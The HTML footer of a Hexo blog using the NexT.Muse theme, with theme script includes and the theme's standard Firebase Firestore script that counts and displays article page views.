  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

    </div>
  </footer>

  
  <script src="//cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  

<script src="/js/local-search.js"></script>






  


  <script src="//cdn.jsdelivr.net/npm/firebase@8.1.1/firebase-app.js"></script>
  <script src="//cdn.jsdelivr.net/npm/firebase@8.1.1/firebase-firestore.js"></script>
  <script>
    firebase.initializeApp({
      apiKey   : 'AIzaSyAuEvcKhmzaqNPpTmExsWwxrEykHOCNZIY',
      projectId: 'bus-chatbot-ugbwji'
    });

    function getCount(doc, increaseCount) {
      // IncreaseCount will be false when not in article page
      return doc.get().then(d => {
        // Has no data, initialize count
        let count = d.exists ? d.data().count : 0;
        // If first view this article
        if (increaseCount) {
          // Increase count
          count++;
          doc.set({
            count
          });
        }
        return count;
      });
    }

    function appendCountTo(el) {
      return count => {
        el.innerText = count;
      };
    }
  </script>
  <script>
    (function() {
      const db = firebase.firestore();
      const articles = db.collection('articles');

      if (CONFIG.page.isPost) {
        // Fix issue #118
        // https://developer.mozilla.org/en-US/docs/Web/API/Node/textContent
        const title = document.querySelector('.post-title').textContent.trim();
        const doc = articles.doc(title);
        let increaseCount = CONFIG.hostname === location.hostname;
        if (localStorage.getItem(title)) {
          increaseCount = false;
        } else {
          // Mark as visited
          localStorage.setItem(title, true);
        }
        getCount(doc, increaseCount).then(appendCountTo(document.querySelector('.firestore-visitors-count')));
      } else if (CONFIG.page.isHome) {
        const promises = [...document.querySelectorAll('.post-title')].map(element => {
          const title = element.textContent.trim();
          const doc = articles.doc(title);
          return getCount(doc);
        });
        Promise.all(promises).then(counts => {
          const metas = document.querySelectorAll('.firestore-visitors-count');
          counts.forEach((val, idx) => {
            appendCountTo(metas[idx])(val);
          });
        });
      }
    })();
  </script>




</body>
</html>
